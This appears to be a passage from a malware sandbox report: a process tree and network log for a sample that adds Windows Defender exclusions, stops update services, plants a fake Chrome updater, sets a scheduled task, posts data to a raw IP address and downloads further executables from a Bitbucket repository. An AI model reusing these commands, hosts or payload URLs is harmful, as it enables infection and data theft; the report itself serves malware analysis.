- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4180 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4996
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:4488 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:1644
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:4948
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2956
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:3268
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:3432
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2760
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4144
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5036
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:532
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2384
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3388 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2224
-
-
C:\ProgramData\GoogleUP\Chrome\Updater.exe"C:\ProgramData\GoogleUP\Chrome\Updater.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2296
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
- Suspicious use of WriteProcessMemory
PID:3524 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:2580
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:756
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:4896
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:4740
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:2608
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:1936
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1052
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4308
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:312
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4804
-
-
C:\Windows\explorer.exeexplorer.exe4⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1220
-
-
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:724
-
-
C:\Users\Admin\AppData\Roaming\service.exeC:\Users\Admin\AppData\Roaming\service.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4952 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4448
-
-
Network
-
Remote address:8.8.8.8:53Request209.205.72.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request88.210.23.2.in-addr.arpaIN PTRResponse88.210.23.2.in-addr.arpaIN PTRa2-23-210-88deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request133.32.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request228.249.119.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requeststeamcommunity.comIN AResponsesteamcommunity.comIN A104.82.234.109
-
Remote address:104.82.234.109:443RequestGET /profiles/76561199780418869 HTTP/1.1
Host: steamcommunity.com
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Sat, 05 Oct 2024 08:22:43 GMT
Content-Length: 34935
Connection: keep-alive
Set-Cookie: sessionid=401345caf6536c5d4b8d8477; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=GB%7Ce15d564837abb028acb4e114150d704d; Path=/; Secure; HttpOnly; SameSite=None
-
Remote address:49.12.197.9:443RequestGET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 08:22:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:8.8.8.8:53Request9.197.12.49.in-addr.arpaIN PTRResponse9.197.12.49.in-addr.arpaIN PTRstatic91971249clientsyour-serverde
-
Remote address:8.8.8.8:53Request109.234.82.104.in-addr.arpaIN PTRResponse109.234.82.104.in-addr.arpaIN PTRa104-82-234-109deploystaticakamaitechnologiescom
-
Remote address:49.12.197.9:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HIJJEGDBFIIDGCAKJEBK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 08:22:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.12.197.9:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEH
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 08:22:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.12.197.9:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HCAEGCBFHJDGCBFHDAFB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 08:22:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.12.197.9:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----EHCFBFBAEBKJKEBGCAEH
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 08:22:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.12.197.9:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IJKKKFCFHCFIECBGDHID
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 4661
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 08:22:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.12.197.9:443RequestGET /sqlp.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 08:22:46 GMT
Content-Type: application/octet-stream
Content-Length: 2459136
Connection: keep-alive
Last-Modified: Saturday, 05-Oct-2024 08:22:46 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
-
Remote address:49.12.197.9:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DAKFIDHDGIEGCAKFIIJK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 08:22:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.12.197.9:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----ECBGCGCGIEGCBFHIIEBF
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 08:22:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.12.197.9:443RequestGET /freebl3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 08:22:48 GMT
Content-Type: application/octet-stream
Content-Length: 685392
Connection: keep-alive
Last-Modified: Saturday, 05-Oct-2024 08:22:48 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
-
Remote address:49.12.197.9:443RequestGET /mozglue.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 08:22:49 GMT
Content-Type: application/octet-stream
Content-Length: 608080
Connection: keep-alive
Last-Modified: Saturday, 05-Oct-2024 08:22:49 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
-
Remote address:49.12.197.9:443RequestGET /msvcp140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 08:22:49 GMT
Content-Type: application/octet-stream
Content-Length: 450024
Connection: keep-alive
Last-Modified: Saturday, 05-Oct-2024 08:22:49 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
-
Remote address:49.12.197.9:443RequestGET /softokn3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 08:22:49 GMT
Content-Type: application/octet-stream
Content-Length: 257872
Connection: keep-alive
Last-Modified: Saturday, 05-Oct-2024 08:22:49 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
-
Remote address:49.12.197.9:443RequestGET /vcruntime140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 08:22:50 GMT
Content-Type: application/octet-stream
Content-Length: 80880
Connection: keep-alive
Last-Modified: Saturday, 05-Oct-2024 08:22:50 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
-
Remote address:49.12.197.9:443RequestGET /nss3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 08:22:50 GMT
Content-Type: application/octet-stream
Content-Length: 2046288
Connection: keep-alive
Last-Modified: Saturday, 05-Oct-2024 08:22:50 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
-
Remote address:49.12.197.9:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CFIEHCFIECBGCBFHIJJK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 1025
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 08:22:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.12.197.9:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IDBGHDGHCGHCAAKFIIEC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 08:22:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.12.197.9:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----ECBGCGCGIEGCBFHIIEBF
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 08:22:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.12.197.9:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BFCAAEHJDBKJJKFHJEBK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 461
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 08:22:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.12.197.9:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----ECFHJKEBAAECBFHIECGI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 08:22:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:8.8.8.8:53Requestbitbucket.orgIN AResponsebitbucket.orgIN A185.166.142.23bitbucket.orgIN A185.166.142.21bitbucket.orgIN A185.166.142.22
-
Remote address:185.166.142.23:443RequestGET /hgtbvfd11/123aqd/downloads/NewApp.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: bitbucket.org
Cache-Control: no-cache
ResponseHTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Content-Length: 0
Server: AtlassianEdge
Location: https://bbuseruploads.s3.amazonaws.com/3b6fbe38-2b9c-4423-ba17-dbc5db6e9e2c/downloads/efc3f4df-566a-4e3d-a8c3-cd4708b4599f/NewApp.exe?response-content-disposition=attachment%3B%20filename%3D%22NewApp.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIOEDZEQY&Signature=Kjq5tG1cimjEQTj0wkOA2GOCLPQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEKH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQCnXgyFltKi3dQpydsVQvAwlMztTPllbRgX4mMAeuidXwIgF3B23dFoYwbLjjC39KAJpIfH2Bj5a14COsVsnfjcQp4qsAII6v%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDEc4xoYs92b5j8nidiqEAswimLEg3%2BZ4O6g8egwzuANPjyidZc7ieOaDWbpGfQCnRP2ws3gvQqxQcqLA084F9TTH3KDgAes9iq9PRXVlp8BAwEwtylETuGENBhLvf9n6%2FRuEaOoRdNNV%2BO4Uh%2BnuRekm4CHIUFL4Mk%2BGTihNv73LT%2F%2BlxkwVgvQQRZDs2XRpxF9axVntPBLFwwfUeJWhYIcTqDIIt2NKvzY%2BmqvdFoJ6Oj%2F6Xz75gc4RDy2G3ZJ3ZeLzobFvLNge9aaSTJfXCYDXDinSkz0W6mgrMgmpr0Gq7K7SXwkNjY7Q1fHkN4TC96FhCtUyLbUAeAz365NyoXrPT9ul2qPupYhI0PZG%2Fix7pCkaMN7ug7gGOp0B8zlzvjZ%2F7zIduo96c0nV%2FQRieWQsdSehGHLrbpI1Lq0wQ7Nu087qZQjtEomi%2Fy3TO3z9CmMUq4c77tK5QTrFqOVd%2F%2BVqmyADdz%2B0qhS0FwaWXJspJLBV3EkUjgAgc5vyIEFLZsH2KAd3j5Q29LuuIftaTgaeCC9qHuzGhQDjtEcajazoBgzYZdwuS7engKURLtjhK3e%2BLHLo3YWIpQ%3D%3D&Expires=1728118374
Expires: Sat, 05 Oct 2024 08:22:54 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
X-Used-Mesh: False
Vary: Accept-Language, Origin
Content-Language: en
X-View-Name: bitbucket.apps.downloads.views.download_file
X-Dc-Location: Micros-3
X-Served-By: db45e76b7fb5
X-Version: 8e66bccd2be3
X-Static-Version: 8e66bccd2be3
X-Request-Count: 2075
X-Render-Time: 0.4971165657043457
X-B3-Traceid: 7d378ac2edac400bb8edaf5f749617e9
X-B3-Spanid: aac2380f9dde3aa9
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
X-Usage-Quota-Remaining: 988171.043
X-Usage-Request-Cost: 11967.73
X-Usage-User-Time: 0.288637
X-Usage-System-Time: 0.070395
X-Usage-Input-Ops: 0
X-Usage-Output-Ops: 0
Age: 0
X-Cache: MISS
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Atl-Traceid: 7d378ac2edac400bb8edaf5f749617e9
Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
Server-Timing: atl-edge;dur=581,atl-edge-internal;dur=3,atl-edge-upstream;dur=580,atl-edge-pop;desc="aws-eu-west-1"
-
Remote address:185.166.142.23:443RequestGET /hgtbvfd11/123aqd/downloads/Updater.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: bitbucket.org
Cache-Control: no-cache
ResponseHTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Content-Length: 0
Server: AtlassianEdge
Location: https://bbuseruploads.s3.amazonaws.com/3b6fbe38-2b9c-4423-ba17-dbc5db6e9e2c/downloads/229e1024-5f7f-478d-87e8-7147253740ca/Updater.exe?response-content-disposition=attachment%3B%20filename%3D%22Updater.exe%22&AWSAccessKeyId=ASIA6KOSE3BNGZQJJ3LT&Signature=nZUikPkEYNyH%2BN7Of20X24D4RWc%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEKH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCICPY6T%2FxbdvaUM6%2FHMyAfa1No%2B3nhNgdiAdegOTeig5iAiEA0rt%2FOYiAqqaV13gbcKAu9tR4jG6JeTBUCFR%2B%2Blc8nDcqsAII6v%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDBEQmbyN6goaJEb7piqEAikvE2kgTu1BlGdTB2Jd%2F1pwDiGFYBo9RjFI1VdiepzQwgzg65z6YcU2PPsmTeUsh9uJyNt1%2BbpL6BfBgRKmAqz6gZV7xG85H%2FTWe1jCwjYsqTcwdLk3UKxTShPQKl%2B4Srg7gs2VrWM%2Bhgf49SYSiNpdzpUJgA5j2ApwYTDCnfPZw1k6jOXdbWrmWBpKKIhoPr8r37XdUeA59X1x01S2oFq2seIzf0wo1SrgQYsA3f9ZPzgne0ILrzeUB6r0dsgXVTE57uAXEOTt5rnt%2F2SESTFGbWdJC3b0CNecPfqsbEDtYMB6q0%2B0WkeaLKXP%2BNwY0TF4USWY2jcvRFZ99AHmpJTtSXCmMOfug7gGOp0B1SA0VjWXp94AbNAVTqjYnmGsaxXDd8KFVTqLt6D3vy2EUeMN7gZdO%2Bd1HsxFiaZ%2B0hm3Xav9zVYNQ15%2Fny2qB5qlJ%2BFNNk1huLZkCmI3faq9SUMCpOELBt38Nh4tgizwqDzDJEFBCBtsTa8%2F%2BeZVK8QBZU0M4basZJkF%2FI%2BaKFdQltAASWCbW52A7eXufbJ8LBmXdKUOWs38nCpu6Q%3D%3D&Expires=1728118383
Expires: Sat, 05 Oct 2024 08:23:03 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
X-Used-Mesh: False
Vary: Accept-Language, Origin
Content-Language: en
X-View-Name: bitbucket.apps.downloads.views.download_file
X-Dc-Location: Micros-3
X-Served-By: 2b8e2936830e
X-Version: 8e66bccd2be3
X-Static-Version: 8e66bccd2be3
X-Request-Count: 3966
X-Render-Time: 1.3546416759490967
X-B3-Traceid: 1accf5bf39c544efba03694af767c8ce
X-B3-Spanid: 48afa128dd543fd9
X-Frame-Options: SAMEORIGIN
